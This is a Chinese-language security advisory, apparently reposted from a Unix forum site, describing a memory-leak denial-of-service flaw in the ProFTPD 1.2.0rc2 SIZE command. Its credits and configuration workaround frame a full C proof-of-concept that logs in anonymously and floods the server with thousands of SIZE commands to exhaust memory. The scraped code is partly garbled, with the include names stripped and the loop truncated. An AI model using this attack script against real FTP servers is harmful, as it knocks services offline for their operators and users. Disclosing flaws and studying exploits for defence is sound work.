描述:
--------------------------------------------------------------------------------
Proftpd是一個流行的Ftp服務軟體。它在執行SIZE命令時存在一個記憶體泄漏的
問題,攻擊者可以利用此問題進行拒絕服務攻擊。
如果執行5000條SIZE命令,將導致系統用300KB記憶體。如果執行大量的SIZE
命令,將使記憶體耗盡,導致拒絕服務攻擊。攻擊者只需要匿名訪問權限即可
進行這種攻擊。
<*來源:Wojciech Purczynski (wp@elzabsoft.pl)
Piotr Zurawski [fb] (szur@ix.renet.pl)
*>
測試程序:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負!
/* Proftpd DoS
* by Piotr Zurawski (szur@ix.renet.pl)
* This source is just an example of memory leakage in proftpd-1.2.0(rc2)
* server discovered by Wojciech Purczynski.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define USERNAME "anonymous"
#define PASSWORD "dupa@dupa.pl"
#define HOWMANY 10000
void logintoftp();
void sendsizes();
int fd;
struct in_addr host;
unsigned short port = 21;
int tcp_connect(struct in_addr addr,unsigned short port);
int main(int argc, char **argv)
{
if (!resolve(argv[1],&host))
{
fprintf(stderr,"Hostname lookup failure\
");
exit(0);
}
fd=tcp_connect(host,port);
logintoftp(fd);
printf("Logged\
");
sendsizes(fd);
printf("Now check out memory usage of proftpd daemon");
printf("Resident set size (RSS) and virtual memory size (VSIZE)");
printf("fields in ps output");
}
void logintoftp()
{
char snd[1024], rcv[1024];
int n;
printf("Logging " USERNAME "/" PASSWORD "\r\
");
memset(snd, '\0', 1024);
sprintf(snd, "USER %s\r\
", USERNAME);
write(fd, snd, strlen(snd));
while((n=read(fd, rcv, sizeof(rcv))) > 0)
{
rcv[n] = 0;
if(strchr(rcv, '\
') != NULL)break;
}
memset(snd, '\0', 1024);
sprintf(snd, "PASS %s\r\
", PASSWORD);
write(fd, snd, strlen(snd));
while((n=read(fd, rcv, sizeof(rcv))) > 0)
{
rcv[n] = 0;
if(strchr(rcv, '\
') != NULL)
break;
}
return;
}
void sendsizes()
{
char snd[1024], rcv[1024];
unsigned long loop;
printf ("Sending %i size commands... \
", HOWMANY);
for(loop=0;loop {
sprintf(snd, "SIZE /dadasjasojdasj/adhjaodhahasohasaoihroaha");
write(fd, snd, strlen(snd));
}
return;
}
int tcp_connect(struct in_addr addr,unsigned short port)
{
int fd;
struct sockaddr_in serv;
bzero(&serv,sizeof(serv)); serv.sin_addr=addr;
serv.sin_port=htons(port);
serv.sin_family=AF_INET;
if ((fd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP)) < 0)\
{
perror("socket");
exit(0);
}
if (connect(fd,(struct sockaddr *)&serv,sizeof(serv)) < 0)
{
perror("connect");
exit(0);
}
return(fd);
}
int resolve(char *hostname,struct in_addr *addr)
{
struct hostent *res;
res=gethostbyname(hostname);
if (res==NULL)
return(0);
memcpy((char *)addr,res->h_addr,res->h_length);
return(1);
}
--------------------------------------------------------------------------------
建議:
臨時解決方法:
Dmitry Alyabyev 提供了一個臨時解決
方法,限制SIZE命令的使用,在配置文件中增加下列語句:
Deny All
廠商補丁:
暫無。
(http://www.fanqiang.com)
進入【UNIX論壇】
|
![[ 永遠的UNIX::UNIX技術資料的寶庫 ]](/images/title.gif)